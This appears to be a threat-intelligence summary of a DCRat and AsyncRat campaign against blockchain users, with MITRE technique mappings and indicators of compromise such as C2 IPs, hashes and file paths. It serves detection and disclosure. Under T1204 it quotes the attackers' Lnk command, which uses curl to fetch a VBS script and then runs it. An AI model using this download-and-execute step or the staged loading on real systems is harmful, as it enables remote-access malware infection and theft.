Threat Research

DCRat Targeting Blockchain Users

Securonix
DCRat Targeting Blockchain Users
EXTRACT IOC
A threat group is targeting blockchain users via a malicious zip file distributed through Telegram, which contains a decoy Lnk file that deploys the DcRat remote access Trojan. The attack uses digitally signed DLLs and a multi-stage payload delivery with different C2 servers to evade detection. #DcRat #AsyncRat #Qi’anxin #Telegram

Keypoints

  • Attackers distribute a malicious zip file named “transfer screenshot 2025.5.31.zip” via Telegram targeting blockchain customers.
  • The zip contains a decoy Lnk file that, when executed, downloads and runs a VBS script to deploy malicious components including digitally signed DLLs.
  • The malicious payload includes DcRat loaded in memory and communicates with multiple C2 servers using self-signed certificates mimicking legitimate domains.
  • A multi-stage infection process uses white and black DLL components to load shellcode and ultimately execute DcRat with different C2 IP addresses.
  • The threat actors also create bitcoin selling websites, likely for fraud, which appear to be propagated through SEO using similar templates.
  • Qi’anxin’s security products including Liuhe engine and TIP platform can detect and block the attack by enabling cloud-based threat checks.
  • Another RAT named AsyncRat was identified with a digitally signed executable and a known C2 server, suggesting multiple remote access tools in use.

MITRE Techniques

  • [T1204] User Execution – Attackers use a malicious Lnk file to trick users into running commands that download and execute a VBS script. (“The Lnk file points to the following commands… cmd.exe /c “curl -o C:UsersPublicaa.vbs … && start C:UsersPublicaa.vbs””)
  • [T1059] Command and Scripting Interpreter – PowerShell and cmd.exe are used to download and execute payloads from remote servers. (“After establishing a connection with C2, start Powershell to download the payload for the second stage”)
  • [T1105] Ingress Tool Transfer – Malicious scripts and DLLs are downloaded from external URLs to the victim machine. (“Download the vbs script from the remote server and start it…”)
  • [T1047] Windows Management Instrumentation – Shellcode is loaded in memory via rundll32.exe to execute the malware payload. (“load it into the newly created process rundll32.exe”)
  • [T1071] Application Layer Protocol – DcRat and AsyncRat communicate with their respective C2 servers over HTTP/HTTPS ports 80 and 443. (“C2 with a self-signed certificate mimicking qianxin.com”)

Indicators of Compromise

  • [File Hash MD5] Malicious files associated with the attack – 05339834a0e7317505c74b58b19aaf0e, 1b98984d2438d7a5d14b4f373b55603b, and 3cf9a8d8b7b68160d7523e60b0e43cd5
  • [Domain] Hosting malicious payloads – zl-web-images.oss-cn-shenzhen.aliyuncs.com
  • [IP Address] DcRat Command and Control servers – 103.45.68.150:80|443, 103.45.68.244:80|443, 103.45.68.203:80|443, and 38.46.13.170:8080
  • [IP Address] AsyncRat Command and Control server – 148.178.16.22:6666
  • [Filename] Decoy and malicious files on victim machines – C:UsersPublicaa.vbs, C:UsersPublicpythonw.exe, C:UsersPublicpython310.dll

Read more: https://ti.qianxin.com/blog/articles/counterfeiting-qianxin-certificates-targeted-attacks-against-blockchain-customers-en/

Views: 40

Tags: BLOCKCHAIN, CLOUD, PAYLOAD, TOOL, TROJAN, WINDOWS